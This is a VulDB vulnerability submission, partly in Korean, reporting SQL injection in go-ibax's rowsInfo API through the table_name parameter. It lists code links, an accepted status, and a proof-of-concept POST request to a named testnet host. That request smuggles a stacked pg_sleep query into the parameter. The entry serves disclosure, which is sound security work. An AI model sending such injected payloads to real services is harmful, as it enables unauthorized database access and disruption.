제출 #50342: SQL injection vulnerability in go-ibax of IBAX-io via table_name parameter정보

제목SQL injection vulnerability in go-ibax of IBAX-io via table_name parameter
설명SQL Injection vulnerability in /packages/api/database.go of go-ibax via table_name parameter .This issue affects versions starting from commits on Jul 18, 2020. file: https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L187 https://github.com/IBAX-io/go-ibax/blob/6bac7462801b5e6da47f1231681bb1516a7dd4bb/packages/api/database.go#L189 commits: https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR172 https://github.com/IBAX-io/go-ibax/commit/ac760982dc31edc904c160c2e5707a28798646e2#diff-bcab25c94cb216acdcdc607a2071aa896f187754698d3d523050308e17f32aabR174 POC: Request URL: https://testnet-hk1.ibax.network:5079/api/v2/open/rowsInfo Request Method: POST PostData: ① order=1&table_name=pg_user"%3b+select+pg_sleep(10)%3b+--"&limit=1&page=1
원천⚠️ https://github.com/IBAX-io/go-ibax/issues/2061
사용자
 Tomy (UID 34751)
제출2022. 11. 01. PM 12:38 (4 연령 ago)
모더레이션2022. 11. 01. PM 04:41 (4 hours later)
상태수락
VulDB 항목212636 [IBAX go-ibax /api/v2/open/rowsInfo table_name SQL 주입]
포인트들20

이전개요다음

Want to know what is going to be exploited?

We predict KEV entries!